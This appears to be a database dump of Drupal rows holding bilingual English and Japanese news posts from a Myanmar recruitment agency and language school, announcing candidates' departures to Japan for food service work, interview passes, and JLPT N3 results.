('activities', 0, 175, 652, 'ja', 0, '<p data-start=\"1161\" data-end=\"1180\"><strong data-start=\"1161\" data-end=\"1180\">2026年3月29日 日本出発</strong></p><p data-start=\"1182\" data-end=\"1254\">ニューコメット・トレーディング・エージェンシーは、WIN WIN THU さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1256\" data-end=\"1292\">日本の外食業界で新たなキャリアを築くため、大きな一歩を踏み出されました。</p><p data-start=\"1294\" data-end=\"1329\">これまでの努力と準備が実を結び、日本での新しい生活と仕事が始まります。</p><p data-start=\"1331\" data-end=\"1375\">今後、多くの経験を積みながら成長され、充実した毎日を送られることを心より願っております。</p><p data-start=\"1377\" data-end=\"1430\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%202.jpg\" data-entity-uuid=\"c8acaa1f-88f4-442a-a773-27b09b321a1d\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%203.jpg\" data-entity-uuid=\"61e5b1a6-5ba5-40f5-8f6f-a35a02349ded\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 176, 653, 'en', 0, '<p data-start=\"249\" data-end=\"286\"><strong data-start=\"249\" data-end=\"286\">Departure to Japan – 5 March 2026</strong></p><p data-start=\"288\" data-end=\"462\">New Comet Trading Agency is pleased to announce that two candidates successfully departed for Japan on 5 March 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"464\" data-end=\"483\">The candidates are:</p><p data-start=\"485\" data-end=\"517\">• Aye Pyae Pyae Lwin<br>• Sabi Oo</p><p data-start=\"519\" data-end=\"644\">Their departure marks the beginning of an exciting journey as they pursue new opportunities in Japan\'s food service industry.</p><p data-start=\"646\" data-end=\"899\">Through dedication, training, and preparation, they have achieved an important milestone toward their professional goals. We are confident that they will continue to grow, gain valuable experience, and contribute positively to their workplaces in Japan.</p><p data-start=\"901\" data-end=\"1014\">We wish both candidates success, happiness, and a rewarding future as they begin this new chapter of their lives.</p><img data-entity-uuid=\"cb1d5cdb-6521-4855-86ea-62b28044fb68\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Sabai%20OO%202.jpg\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p><img data-entity-uuid=\"ce4dc739-1531-43b5-9395-dbff9148d993\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Aye%20Pyae%20Pyae%20Lwin%203.jpg\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 176, 654, 'en', 0, '<p data-start=\"249\" data-end=\"286\"><strong data-start=\"249\" data-end=\"286\">Departure to Japan – 5 March 2026</strong></p><p data-start=\"288\" data-end=\"462\">New Comet Trading Agency is pleased to announce that two candidates successfully departed for Japan on 5 March 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"464\" data-end=\"483\">The candidates are:</p><p data-start=\"485\" data-end=\"517\">• Aye Pyae Pyae Lwin<br>• Sabi Oo</p><p data-start=\"519\" data-end=\"644\">Their departure marks the beginning of an exciting journey as they pursue new opportunities in Japan\'s food service industry.</p><p data-start=\"646\" data-end=\"899\">Through dedication, training, and preparation, they have achieved an important milestone toward their professional goals. We are confident that they will continue to grow, gain valuable experience, and contribute positively to their workplaces in Japan.</p><p data-start=\"901\" data-end=\"1014\">We wish both candidates success, happiness, and a rewarding future as they begin this new chapter of their lives.</p><img data-entity-uuid=\"cb1d5cdb-6521-4855-86ea-62b28044fb68\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Sabai%20OO%202.jpg\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p><img data-entity-uuid=\"ce4dc739-1531-43b5-9395-dbff9148d993\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Aye%20Pyae%20Pyae%20Lwin%203.jpg\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 176, 654, 'ja', 0, '<p data-start=\"1173\" data-end=\"1191\"><strong data-start=\"1173\" data-end=\"1191\">2026年3月5日 日本出発</strong></p><p data-start=\"1193\" data-end=\"1260\">ニューコメット・トレーディング・エージェンシーは、以下の2名の候補者が特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1262\" data-end=\"1300\">• AYE PYAE PYAE LWIN さん<br>• SABAI OO さん</p><p data-start=\"1302\" data-end=\"1332\">お二人は、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1334\" data-end=\"1385\">これまでの学習や準備の成果を活かし、日本で多くの経験を積みながら成長されることを心より願っております。</p><p data-start=\"1387\" data-end=\"1419\">お二人の今後のご活躍と充実した日本での生活をお祈り申し上げます。</p><p data-start=\"1421\" data-end=\"1474\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Sabai%20OO%202.jpg\" data-entity-uuid=\"cb1d5cdb-6521-4855-86ea-62b28044fb68\" data-entity-type=\"file\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Aye%20Pyae%20Pyae%20Lwin%203.jpg\" data-entity-uuid=\"ce4dc739-1531-43b5-9395-dbff9148d993\" data-entity-type=\"file\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 177, 655, 'en', 0, '<p data-start=\"265\" data-end=\"306\"><strong data-start=\"265\" data-end=\"306\">Departure to Japan – 12 February 2026</strong></p><p data-start=\"308\" data-end=\"491\">New Comet Trading Agency is pleased to announce that Ms. Tun Eaindra Moe successfully departed for Japan on 12 February 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"493\" data-end=\"633\">This achievement marks the beginning of a new chapter in her professional journey as she starts her career in Japan\'s food service industry.</p><p data-start=\"635\" data-end=\"776\">Through determination, preparation, and hard work, she has taken an important step toward achieving her goals and building a brighter future.</p><p data-start=\"778\" data-end=\"888\">We extend our sincere congratulations and wish her success, happiness, and many valuable experiences in Japan.</p><p data-start=\"890\" data-end=\"975\">May her new journey be filled with growth, opportunities, and memorable achievements.</p><img data-entity-uuid=\"628dca1b-6798-4314-9473-97858d65845a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure-TEM-2.jpg\"><p data-start=\"890\" data-end=\"975\">&nbsp;</p><img data-entity-uuid=\"987dbd4c-8aaa-4956-a18b-807e73155bc2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure-TEM-3.jpg\">', '', 'full_html'),
('activities', 0, 177, 656, 'en', 0, '<p data-start=\"265\" data-end=\"306\"><strong data-start=\"265\" data-end=\"306\">Departure to Japan – 12 February 2026</strong></p><p data-start=\"308\" data-end=\"491\">New Comet Trading Agency is pleased to announce that Ms. Tun Eaindra Moe successfully departed for Japan on 12 February 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"493\" data-end=\"633\">This achievement marks the beginning of a new chapter in her professional journey as she starts her career in Japan\'s food service industry.</p><p data-start=\"635\" data-end=\"776\">Through determination, preparation, and hard work, she has taken an important step toward achieving her goals and building a brighter future.</p><p data-start=\"778\" data-end=\"888\">We extend our sincere congratulations and wish her success, happiness, and many valuable experiences in Japan.</p><p data-start=\"890\" data-end=\"975\">May her new journey be filled with growth, opportunities, and memorable achievements.</p><img data-entity-uuid=\"628dca1b-6798-4314-9473-97858d65845a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure-TEM-2.jpg\"><p data-start=\"890\" data-end=\"975\">&nbsp;</p><img data-entity-uuid=\"987dbd4c-8aaa-4956-a18b-807e73155bc2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure-TEM-3.jpg\">', '', 'full_html'),
('activities', 0, 177, 656, 'ja', 0, '<p data-start=\"1145\" data-end=\"1164\"><strong data-start=\"1145\" data-end=\"1164\">2026年2月12日 日本出発</strong></p><p data-start=\"1166\" data-end=\"1242\">ニューコメット・トレーディング・エージェンシーは、TUN EAINDRA MOE さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1244\" data-end=\"1298\">日本の外食業界で新たなキャリアをスタートされることとなり、ご本人にとって大きな節目となる素晴らしい機会です。</p><p data-start=\"1300\" data-end=\"1343\">これまでの努力と準備が実を結び、日本での新しい生活と仕事への第一歩を踏み出されました。</p><p data-start=\"1345\" data-end=\"1389\">今後、多くの経験を積みながら成長され、充実した毎日を送られることを心より願っております。</p><p data-start=\"1391\" data-end=\"1420\">お仕事と生活の両面でご活躍されることをお祈り申し上げます。</p><img src=\"/sites/default/files/inline-images/Departure-TEM-2.jpg\" data-entity-uuid=\"628dca1b-6798-4314-9473-97858d65845a\" data-entity-type=\"file\"><p data-start=\"890\" data-end=\"975\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure-TEM-3.jpg\" data-entity-uuid=\"987dbd4c-8aaa-4956-a18b-807e73155bc2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 178, 661, 'en', 0, '<p data-start=\"346\" data-end=\"380\"><strong data-start=\"346\" data-end=\"380\">Interview Success Announcement</strong></p><p data-start=\"382\" data-end=\"552\">New Comet Trading Agency is delighted to announce that Ms. Phyo Thiri Htet has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"554\" data-end=\"767\">Passing the interview represents an important milestone in her journey toward a professional caregiving career in Japan. Her dedication, preparation, and determination have contributed greatly to this achievement.</p><p data-start=\"769\" data-end=\"904\">As she moves forward to the next stages of the employment process, we wish her continued success and confidence in achieving her goals.</p><p data-start=\"906\" data-end=\"1035\">We look forward to seeing her begin a meaningful career in Japan\'s caregiving sector and make a positive impact through her work.</p><p data-start=\"906\" data-end=\"1035\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 178, 662, 'en', 0, '<p data-start=\"346\" data-end=\"380\"><strong data-start=\"346\" data-end=\"380\">Interview Success Announcement</strong></p><p data-start=\"382\" data-end=\"552\">New Comet Trading Agency is delighted to announce that Ms. Phyo Thiri Htet has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"554\" data-end=\"767\">Passing the interview represents an important milestone in her journey toward a professional caregiving career in Japan. Her dedication, preparation, and determination have contributed greatly to this achievement.</p><p data-start=\"769\" data-end=\"904\">As she moves forward to the next stages of the employment process, we wish her continued success and confidence in achieving her goals.</p><p data-start=\"906\" data-end=\"1035\">We look forward to seeing her begin a meaningful career in Japan\'s caregiving sector and make a positive impact through her work.</p><p data-start=\"906\" data-end=\"1035\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 178, 662, 'ja', 0, '<p data-start=\"1189\" data-end=\"1202\"><strong data-start=\"1189\" data-end=\"1202\">面接合格のお知らせ</strong></p><p data-start=\"1204\" data-end=\"1280\">ニューコメット・トレーディング・エージェンシーは、PHYO THIRI HTET さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1282\" data-end=\"1351\">今回の合格は、日本で介護分野のキャリアを築くための大切な一歩となりました。これまでの努力と準備が実を結び、素晴らしい成果につながりました。</p><p data-start=\"1353\" data-end=\"1399\">今後の手続きが順調に進み、日本での新たな挑戦が実り多いものとなることを心より願っております。</p><p data-start=\"1401\" data-end=\"1425\">介護分野でのさらなるご活躍をお祈り申し上げます。</p><p data-start=\"906\" data-end=\"1035\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 179, 663, 'en', 0, '<p data-start=\"367\" data-end=\"401\"><strong data-start=\"367\" data-end=\"401\">Interview Success Announcement</strong></p><p data-start=\"403\" data-end=\"530\">New Comet Trading Agency is pleased to share another successful interview result from our Tokutei Ginou (Food Service) program.</p><p data-start=\"532\" data-end=\"656\">Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"658\" data-end=\"813\">This achievement reflects not only her dedication and effort but also the importance of proper preparation and training throughout the recruitment process.</p><p data-start=\"815\" data-end=\"1007\">At New Comet Trading Agency, we remain committed to connecting qualified Myanmar candidates with reliable employment opportunities in Japan and supporting them throughout their career journey.</p><p data-start=\"1009\" data-end=\"1146\">We sincerely congratulate Ms. Myat Thandar Kyaw and wish her continued success in the upcoming procedures and future employment in Japan.</p><p data-start=\"1009\" data-end=\"1146\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 179, 664, 'en', 0, '<p data-start=\"367\" data-end=\"401\"><strong data-start=\"367\" data-end=\"401\">Interview Success Announcement</strong></p><p data-start=\"403\" data-end=\"530\">New Comet Trading Agency is pleased to share another successful interview result from our Tokutei Ginou (Food Service) program.</p><p data-start=\"532\" data-end=\"656\">Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"658\" data-end=\"813\">This achievement reflects not only her dedication and effort but also the importance of proper preparation and training throughout the recruitment process.</p><p data-start=\"815\" data-end=\"1007\">At New Comet Trading Agency, we remain committed to connecting qualified Myanmar candidates with reliable employment opportunities in Japan and supporting them throughout their career journey.</p><p data-start=\"1009\" data-end=\"1146\">We sincerely congratulate Ms. Myat Thandar Kyaw and wish her continued success in the upcoming procedures and future employment in Japan.</p><p data-start=\"1009\" data-end=\"1146\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 179, 664, 'ja', 0, '<p data-start=\"1304\" data-end=\"1317\"><strong data-start=\"1304\" data-end=\"1317\">面接合格のお知らせ</strong></p><p data-start=\"1319\" data-end=\"1379\">ニューコメット・トレーディング・エージェンシーは、特定技能（外食業）プログラムにおける嬉しい合格結果をご報告いたします。</p><p data-start=\"1381\" data-end=\"1426\">MYAT THANDAR KYAW さんが、特定技能（外食業）の採用面接に合格されました。</p><p data-start=\"1428\" data-end=\"1479\">今回の合格は、ご本人の努力と熱意の成果であるとともに、面接に向けた準備と学習の積み重ねによるものです。</p><p data-start=\"1481\" data-end=\"1561\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材と日本企業を結びつける架け橋として、就職活動から渡日後まで継続的な支援を行ってまいります。</p><p data-start=\"1563\" data-end=\"1603\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1563\" data-end=\"1603\">&nbsp;</p><p data-start=\"1009\" data-end=\"1146\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 180, 665, 'ja', 0, '<p data-start=\"365\" data-end=\"410\"><strong data-start=\"365\" data-end=\"410\">Celebrating a Successful Interview Result</strong></p><p data-start=\"412\" data-end=\"592\">New Comet Trading Agency is delighted to announce that Ms. Hsu Wyne Wyne Pyae has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"594\" data-end=\"715\">This accomplishment reflects her commitment, perseverance, and determination to pursue employment opportunities in Japan.</p><p data-start=\"717\" data-end=\"879\">Passing the interview is an important step toward building a professional career abroad and demonstrates her readiness for the challenges and opportunities ahead.</p><p data-start=\"881\" data-end=\"1038\">We sincerely congratulate Ms. Hsu Wyne Wyne Pyae on this achievement and wish her success throughout the remaining procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 666, 'en', 0, '<p data-start=\"365\" data-end=\"410\"><strong data-start=\"365\" data-end=\"410\">Celebrating a Successful Interview Result</strong></p><p data-start=\"412\" data-end=\"592\">New Comet Trading Agency is delighted to announce that Ms. Hsu Wyne Wyne Pyae has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"594\" data-end=\"715\">This accomplishment reflects her commitment, perseverance, and determination to pursue employment opportunities in Japan.</p><p data-start=\"717\" data-end=\"879\">Passing the interview is an important step toward building a professional career abroad and demonstrates her readiness for the challenges and opportunities ahead.</p><p data-start=\"881\" data-end=\"1038\">We sincerely congratulate Ms. Hsu Wyne Wyne Pyae on this achievement and wish her success throughout the remaining procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 667, 'en', 0, '<p data-start=\"365\" data-end=\"410\"><strong data-start=\"365\" data-end=\"410\">Celebrating a Successful Interview Result</strong></p><p data-start=\"412\" data-end=\"592\">New Comet Trading Agency is delighted to announce that Ms. Hsu Wyne Wyne Pyae has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"594\" data-end=\"715\">This accomplishment reflects her commitment, perseverance, and determination to pursue employment opportunities in Japan.</p><p data-start=\"717\" data-end=\"879\">Passing the interview is an important step toward building a professional career abroad and demonstrates her readiness for the challenges and opportunities ahead.</p><p data-start=\"881\" data-end=\"1038\">We sincerely congratulate Ms. Hsu Wyne Wyne Pyae on this achievement and wish her success throughout the remaining procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 667, 'ja', 0, '<p data-start=\"1197\" data-end=\"1210\"><strong data-start=\"1197\" data-end=\"1210\">面接合格のお知らせ</strong></p><p data-start=\"1212\" data-end=\"1292\">ニューコメット・トレーディング・エージェンシーは、HSU WYNE WYNE PYAE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1294\" data-end=\"1347\">今回の合格は、ご本人の努力と継続的な学習の成果であり、日本で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1349\" data-end=\"1389\">面接合格は新たなキャリアへの重要な第一歩であり、今後の活躍が大いに期待されます。</p><p data-start=\"1391\" data-end=\"1431\">心よりお祝い申し上げるとともに、日本でのご活躍とさらなる成功をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 181, 668, 'en', 0, '<p data-start=\"374\" data-end=\"405\"><strong data-start=\"374\" data-end=\"405\">JLPT N3 Success Achievement</strong></p><p data-start=\"407\" data-end=\"558\">New Comet Language Center is proud to announce that Ms. Su Su San has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"560\" data-end=\"743\">Having completed her N5, N4, and N3 studies at New Comet Language Center, she demonstrated dedication, perseverance, and a strong commitment to improving her Japanese language skills.</p><p data-start=\"745\" data-end=\"928\">Passing the JLPT N3 examination is a significant achievement and an important milestone for those pursuing higher education, career development, and employment opportunities in Japan.</p><p data-start=\"930\" data-end=\"1071\">We sincerely congratulate Ms. Su Su San on her success and wish her continued progress in her Japanese language studies and future endeavors.</p>', '', 'full_html'),
('activities', 0, 181, 669, 'en', 0, '<p data-start=\"374\" data-end=\"405\"><strong data-start=\"374\" data-end=\"405\">JLPT N3 Success Achievement</strong></p><p data-start=\"407\" data-end=\"558\">New Comet Language Center is proud to announce that Ms. Su Su San has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"560\" data-end=\"743\">Having completed her N5, N4, and N3 studies at New Comet Language Center, she demonstrated dedication, perseverance, and a strong commitment to improving her Japanese language skills.</p><p data-start=\"745\" data-end=\"928\">Passing the JLPT N3 examination is a significant achievement and an important milestone for those pursuing higher education, career development, and employment opportunities in Japan.</p><p data-start=\"930\" data-end=\"1071\">We sincerely congratulate Ms. Su Su San on her success and wish her continued progress in her Japanese language studies and future endeavors.</p>', '', 'full_html'),
('activities', 0, 181, 669, 'ja', 0, '<p data-start=\"1229\" data-end=\"1252\"><strong data-start=\"1229\" data-end=\"1252\">JLPT N3合格おめでとうございます</strong></p><p data-start=\"1254\" data-end=\"1315\">ニューコメット日本語学校は、SU SU SAN さんが日本語能力試験（JLPT）N3に合格されたことをお知らせいたします。</p><p data-start=\"1317\" data-end=\"1387\">SU SU SAN さんは、当校でN5・N4・N3の学習課程を修了し、日々の努力と継続的な学習を通じて今回の素晴らしい成果を達成されました。</p><p data-start=\"1389\" data-end=\"1445\">JLPT N3の合格は、日本語能力の向上を証明する重要な成果であり、日本での進学や就職への大きな一歩となります。</p><p data-start=\"1447\" data-end=\"1486\">心よりお祝い申し上げるとともに、今後のさらなる成長とご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 182, 670, 'en', 0, '<p data-start=\"355\" data-end=\"400\"><strong data-start=\"355\" data-end=\"400\">Celebrating Academic Progress and Success</strong></p><p data-start=\"402\" data-end=\"558\">New Comet Language Center is delighted to announce that Ms. Aye Thazin has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"560\" data-end=\"694\">Her achievement is the result of continuous learning and dedication throughout her studies from N5 to N3 at New Comet Language Center.</p><p data-start=\"696\" data-end=\"865\">The successful completion of the JLPT N3 level demonstrates not only improved language proficiency but also a strong commitment to personal and professional development.</p><p data-start=\"867\" data-end=\"1042\">We are proud of her accomplishment and look forward to seeing her continue to advance toward even greater goals in Japanese language education and future career opportunities.</p><p data-start=\"1044\" data-end=\"1092\">Congratulations on this outstanding achievement.</p>', '', 'full_html'),
('activities', 0, 182, 671, 'en', 0, '<p data-start=\"355\" data-end=\"400\"><strong data-start=\"355\" data-end=\"400\">Celebrating Academic Progress and Success</strong></p><p data-start=\"402\" data-end=\"558\">New Comet Language Center is delighted to announce that Ms. Aye Thazin has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"560\" data-end=\"694\">Her achievement is the result of continuous learning and dedication throughout her studies from N5 to N3 at New Comet Language Center.</p><p data-start=\"696\" data-end=\"865\">The successful completion of the JLPT N3 level demonstrates not only improved language proficiency but also a strong commitment to personal and professional development.</p><p data-start=\"867\" data-end=\"1042\">We are proud of her accomplishment and look forward to seeing her continue to advance toward even greater goals in Japanese language education and future career opportunities.</p><p data-start=\"1044\" data-end=\"1092\">Congratulations on this outstanding achievement.</p>', '', 'full_html'),
('activities', 0, 182, 671, 'ja', 0, '<p data-start=\"1255\" data-end=\"1279\"><strong data-start=\"1255\" data-end=\"1279\">学習の成果とJLPT N3合格のお知らせ</strong></p><p data-start=\"1281\" data-end=\"1343\">ニューコメット日本語学校は、AYE THAZIN さんが日本語能力試験（JLPT）N3に合格されたことをお知らせいたします。</p><p data-start=\"1345\" data-end=\"1410\">AYE THAZIN さんは、当校でN5からN3まで継続して学習され、努力を積み重ねた結果、今回の素晴らしい成果を達成されました。</p><p data-start=\"1412\" data-end=\"1468\">JLPT N3合格は、日本語能力の向上を証明するだけでなく、将来の進学や就職に向けた大切なステップでもあります。</p><p data-start=\"1470\" data-end=\"1502\">今後もさらなる日本語能力の向上とご活躍を心より期待しております。</p><p data-start=\"1504\" data-end=\"1515\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 183, 672, 'en', 0, '<p data-start=\"397\" data-end=\"446\"><strong data-start=\"397\" data-end=\"446\">A New Milestone in Japanese Language Learning</strong></p><p data-start=\"448\" data-end=\"606\">New Comet Language Center is pleased to announce that Ms. Aye Pwint Phyu has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"608\" data-end=\"782\">After completing her N5, N4, and N3 studies at New Comet Language Center, she achieved this important milestone through consistent effort and dedication to language learning.</p><p data-start=\"784\" data-end=\"932\">Obtaining JLPT N3 certification creates new opportunities for further education, professional development, and employment pathways related to Japan.</p><p data-start=\"934\" data-end=\"1076\">We are delighted to celebrate her success and encourage her to continue pursuing higher levels of Japanese language proficiency in the future.</p><p data-start=\"1078\" data-end=\"1183\">Congratulations on this wonderful achievement, and we wish her continued success in all future endeavors.</p>', '', 'full_html'),
('activities', 0, 183, 673, 'en', 0, '<p data-start=\"397\" data-end=\"446\"><strong data-start=\"397\" data-end=\"446\">A New Milestone in Japanese Language Learning</strong></p><p data-start=\"448\" data-end=\"606\">New Comet Language Center is pleased to announce that Ms. Aye Pwint Phyu has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"608\" data-end=\"782\">After completing her N5, N4, and N3 studies at New Comet Language Center, she achieved this important milestone through consistent effort and dedication to language learning.</p><p data-start=\"784\" data-end=\"932\">Obtaining JLPT N3 certification creates new opportunities for further education, professional development, and employment pathways related to Japan.</p><p data-start=\"934\" data-end=\"1076\">We are delighted to celebrate her success and encourage her to continue pursuing higher levels of Japanese language proficiency in the future.</p><p data-start=\"1078\" data-end=\"1183\">Congratulations on this wonderful achievement, and we wish her continued success in all future endeavors.</p>', '', 'full_html'),
('activities', 0, 183, 673, 'ja', 0, '<p data-start=\"1353\" data-end=\"1371\"><strong data-start=\"1353\" data-end=\"1371\">JLPT N3合格のお知らせ</strong></p><p data-start=\"1373\" data-end=\"1439\">ニューコメット日本語学校は、AYE PWINT PHYU さんが日本語能力試験（JLPT）N3に合格されたことをお知らせいたします。</p><p data-start=\"1441\" data-end=\"1491\">N5・N4・N3の学習課程を修了し、継続的な努力を重ねた結果、今回の素晴らしい成果を達成されました。</p><p data-start=\"1493\" data-end=\"1558\">JLPT N3の取得は、日本語能力の向上を証明するだけでなく、進学や就職など将来のさまざまな可能性を広げる重要な資格でもあります。</p><p data-start=\"1560\" data-end=\"1606\">今後もさらなる目標に向かって挑戦を続けられ、ますます活躍されることを心より期待しております。</p><p data-start=\"1608\" data-end=\"1619\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 184, 674, 'en', 0, '<p data-start=\"394\" data-end=\"434\"><strong data-start=\"394\" data-end=\"434\">Departure to Japan – 26 January 2026</strong></p><p data-start=\"436\" data-end=\"615\">New Comet Trading Agency is pleased to announce that Ms. Ei Ei Phyoe and Ms. Moe Moe Zaw successfully departed for Japan under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"617\" data-end=\"785\">Before reaching this important stage, both candidates completed language learning, interview preparation, and employment procedures required for overseas work in Japan.</p><p data-start=\"787\" data-end=\"907\">Their departure reflects the effort, commitment, and determination they demonstrated throughout the preparation process.</p><p data-start=\"909\" data-end=\"1082\">As they begin their careers in Japan\'s food service industry, we wish them success, valuable professional experiences, and continued growth in their new working environment.</p>', '', 'full_html'),
('activities', 0, 184, 675, 'en', 0, '<p data-start=\"394\" data-end=\"434\"><strong data-start=\"394\" data-end=\"434\">Departure to Japan – 26 January 2026</strong></p><p data-start=\"436\" data-end=\"615\">New Comet Trading Agency is pleased to announce that Ms. Ei Ei Phyoe and Ms. Moe Moe Zaw successfully departed for Japan under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"617\" data-end=\"785\">Before reaching this important stage, both candidates completed language learning, interview preparation, and employment procedures required for overseas work in Japan.</p><p data-start=\"787\" data-end=\"907\">Their departure reflects the effort, commitment, and determination they demonstrated throughout the preparation process.</p><p data-start=\"909\" data-end=\"1082\">As they begin their careers in Japan\'s food service industry, we wish them success, valuable professional experiences, and continued growth in their new working environment.</p>', '', 'full_html'),
('activities', 0, 184, 675, 'ja', 0, '<p data-start=\"1266\" data-end=\"1285\"><strong data-start=\"1266\" data-end=\"1285\">2026年1月26日 日本出発</strong></p><p data-start=\"1287\" data-end=\"1375\">ニューコメット・トレーディング・エージェンシーは、EI EI PHYOE さんと MOE MOE ZAW さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1377\" data-end=\"1423\">お二人は日本で働くために、日本語学習や面接対策、各種手続きを経て今回の出発を迎えられました。</p><p data-start=\"1425\" data-end=\"1468\">これまで積み重ねてきた努力と準備が実を結び、新たなキャリアへの第一歩を踏み出されます。</p><p data-start=\"1470\" data-end=\"1517\">日本で多くの経験を積みながら成長され、充実した仕事と生活を送られることを心より願っております。</p>', '', 'full_html'),
('activities', 0, 185, 676, 'en', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">Interview Success Announcement</strong></p><p data-start=\"430\" data-end=\"602\">New Comet Trading Agency is pleased to announce that Ms. Hnin Wa Than has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"604\" data-end=\"837\">This accomplishment represents an important step toward her professional development and future career in Japan. Through dedication and careful preparation, she has successfully progressed to the next stage of the employment process.</p><p data-start=\"839\" data-end=\"999\">The Food Service sector continues to provide valuable career opportunities for motivated individuals seeking international work experience and long-term growth.</p><p data-start=\"1001\" data-end=\"1131\">We sincerely congratulate Ms. Hnin Wa Than on her achievement and wish her every success as she prepares for her journey to Japan.</p>', '', 'full_html'),
('activities', 0, 185, 677, 'en', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">Interview Success Announcement</strong></p><p data-start=\"430\" data-end=\"602\">New Comet Trading Agency is pleased to announce that Ms. Hnin Wa Than has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"604\" data-end=\"837\">This accomplishment represents an important step toward her professional development and future career in Japan. Through dedication and careful preparation, she has successfully progressed to the next stage of the employment process.</p><p data-start=\"839\" data-end=\"999\">The Food Service sector continues to provide valuable career opportunities for motivated individuals seeking international work experience and long-term growth.</p><p data-start=\"1001\" data-end=\"1131\">We sincerely congratulate Ms. Hnin Wa Than on her achievement and wish her every success as she prepares for her journey to Japan.</p>', '', 'full_html'),
('activities', 0, 185, 678, 'en', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">Interview Success Announcement</strong></p><p data-start=\"430\" data-end=\"602\">New Comet Trading Agency is pleased to announce that Ms. Hnin Wa Than has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"604\" data-end=\"837\">This accomplishment represents an important step toward her professional development and future career in Japan. Through dedication and careful preparation, she has successfully progressed to the next stage of the employment process.</p><p data-start=\"839\" data-end=\"999\">The Food Service sector continues to provide valuable career opportunities for motivated individuals seeking international work experience and long-term growth.</p><p data-start=\"1001\" data-end=\"1131\">We sincerely congratulate Ms. Hnin Wa Than on her achievement and wish her every success as she prepares for her journey to Japan.</p>', '', 'full_html'),
